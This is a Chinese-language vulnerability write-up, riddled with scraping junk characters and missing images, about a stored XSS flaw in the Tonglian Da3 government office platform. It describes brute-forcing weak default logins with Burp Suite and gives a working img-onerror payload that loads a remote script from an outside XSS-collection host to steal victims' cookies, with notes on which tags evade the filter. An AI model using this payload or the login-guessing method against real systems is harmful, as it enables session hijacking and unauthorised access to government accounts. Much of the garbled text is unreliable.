" x$ }3 t) E3 \: p( j5 m ; |6 @/ Q1 N; P
同联Da3协同办公平台后台通用储存型xss漏洞
- H' S4 a0 A0 D
/ Z/ y, }% ]6 c
4 i0 G1 K2 z* ` 平台简介:6 A2 U6 M X1 ?2 F! m1 g
, s% D# p, w X) B
- B+ i+ O+ K& z ^
/ A! I# n' D" M* G' U) }0 `9 R9 p
2 x) j$ c% }1 \( _" K8 `
; s8 N ~0 Q' I2 s* C+ O6 l0 [ @
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 f% j% K4 r, e1 P同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* ?8 O6 ^! l$ j2 l; D" N! u" W+ q
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
% H6 U- ^: j2 ~& N5 v
3 ?# A# d5 L6 l; m: P3 Q9 ]
2 V ~6 x* v; e6 @3 O$ h& d' M & L& D) `6 s& k- {7 N& Q
7 y8 z o6 y" k1 G+ Q. N
( F6 k+ S; ~$ v' ^9 L 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:# L s4 c' U/ Z2 l* r$ R& Y3 _
7 Q* Q2 g1 v; S
% V" \- q; Y: Z! G* _" o3 l9 J
" ]5 G% J% _( F2 P: A# ?/ W
) J8 _9 K2 v- u b
& v) C" F8 f( V) s- s http://1.1.1.1:7197/cap-aco/#(案例2-)8 g+ d: }$ P: d2 n' I' r
$ w* e( r0 F" ~ & Q. {) j: ^9 f
http://www.XXOO.com (案例1-官网网站), e8 f) Y3 w7 n. Z2 w X, L' q
7 n2 w& ^! E- d2 E ^) j* k
8 t N8 c) z; P
漏洞详情:6 n% K0 B+ {/ o+ @
% q; v$ p' }+ d d& a o J
2 f- o' I/ g' n' A8 y 案例一、
3 S: ^+ d4 b+ k: T7 r
* F# C0 h0 h* |: V* @ 7 ?- q9 Z6 p0 w7 m1 R6 w0 I' A) C
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试- Z+ b6 i$ C: {
4 v. |$ c$ [; d$ P k
8 v3 f% @5 c" K( h 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( z# W5 _$ M5 S+ d4 q7 [- c
( P) j+ C) ~. c, R' ` o / D' e: W6 x2 ?# D" O9 m
- ^+ H5 r5 N8 p% b
5 s; R O% V0 ^" S- d9 _! R, K% H" U ; N A7 a* @* B: D7 P( Y
$ K( ~8 U! ?9 I
6 j, J/ X* s( F4 f
3 e3 T: K$ `% m
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
& p6 [% E. e% K& B
& _( {1 ?) W7 @6 i$ R
4 W0 H' Z8 R- c* ?1 O5 T0 X# ?
, f8 C3 t( G$ b& X
' P& [# X0 v- h% Z* ^ . O8 h; D$ h1 S
0 }1 K& N: z) c5 J9 a% A
3 U% j0 S" E' `
( W6 F6 M9 t7 _3 n) G8 \ 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 7 w1 r9 L# {/ o# O) O
x6 ]* F0 F1 n. I) R4 I3 J
2 g$ a% l6 v7 x8 w9 z( w0 I
3 V* O) g2 K- b. s# _9 m
: S f# P# R* S0 g. s. Z$ [2 e
7 T2 P& O A7 m! D3 Z <img src=x
# G# X+ E8 X k, y3 F. }onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
. d. p- E% U) r v) m
$ M. m+ @2 x, X7 T1 J. Z! s
1 b0 n( Q+ H2 m+ u8 U: Y: m1 t
$ w! Q# a1 ]6 j- V
# a: r- g! x+ F8 x. S7 D/ \* h
5 u: d/ o# z& o! @$ X) y4 ~ l4 [ 然后发送,接收cookie如图:
7 q A* d S% J% x0 `
3 ~8 S. i) w4 Y- W9 f
& g U0 o+ \! Q" W
$ o3 [5 G% _! ] A
: U) Y: F& Z U, r9 f 9 z d8 S+ o" f2 l4 H
& f1 g6 u! ]0 {& k
+ m! ]0 {$ X' o& F # Q, p, I. k! u2 w3 L
& Q; Z7 \2 i& C3 }# a
5 Q- S7 o0 Q9 b3 W, X" V+ F4 i1 s
9 o* {; K! K: x& E5 r . j- W& W0 B; v
! ?% s: s4 \/ I) E9 w8 B8 ~
' P5 |, k% L7 b0 D3 T/ t1 z
9 G# [7 j; h" i7 S, l# C
6 z: t! x7 B: N( p' D- m7 k) `
! p2 \3 @ |1 y9 F: P& A1 J
/ l! k/ D2 `% H4 j, g6 o
. N4 e1 R& r9 x& V, f) r
9 Y& F7 S" d) H' `( ^) G 7 T, M4 D, E( o2 p7 O/ E
6 }$ v' E& s/ s! i" ? 8 z4 j( w" T! P+ N0 \0 o2 g
案例2、 3 C8 P. T7 q$ s) m" N( G; T
$ O- {) _5 d# x$ I* A2 ?3 F0 b0 c
8 @% U$ J4 o9 w& E0 L% d2 I" F* C
前面步骤都一样,下面看效果图:
7 F2 |9 P, A" b
) v7 K5 H' a5 {) O; w
5 A; { J% O* A- e/ u- x& p
6 m" h* Q* B6 J
8 N# m% f4 v3 J4 V/ Z 5 N0 H U: ]# \- C3 i- T7 V# e+ r
0 f/ m* W8 |( N( o9 o. t
+ n# y# J# _' B2 }7 e
8 s& s- R$ b( h0 D! D4 s
$ R8 n( P5 I8 {) {- M
6 g, h! S4 W5 W1 K& a $ r" B5 p+ L) Q r& T; [( V$ S
3 f% H9 F* @2 ~8 }! Y8 K
) g1 x6 Y: `; d2 w, P* Q0 z
- S3 Z( L2 q3 F8 `1 R5 N' d( b
. F( A2 ^) B! s9 O' S
3 L, N/ X6 @! k( T+ i* O
9 b2 L0 @+ I% L( Q% X( C' t+ l
, h; H- A; Z }' n8 N( n: a
# c' S2 @4 N" ` p. @/ a
. e3 _4 e' U5 p8 V8 L5 t8 n
' W, Y% q3 k" j' ~6 @0 W
& P/ P- h: L( u7 p$ ^& z
, Y$ D) L$ a: a1 t: B5 Q. v3 [$ t
( L3 H6 E1 T. C6 s
& h% e5 I9 x! o6 g# J/ J( T: c6 i
3 X% {2 t$ O/ B% n$ K% {
+ }5 O1 N/ F6 O* @
: P, z9 `) Z# G+ y4 a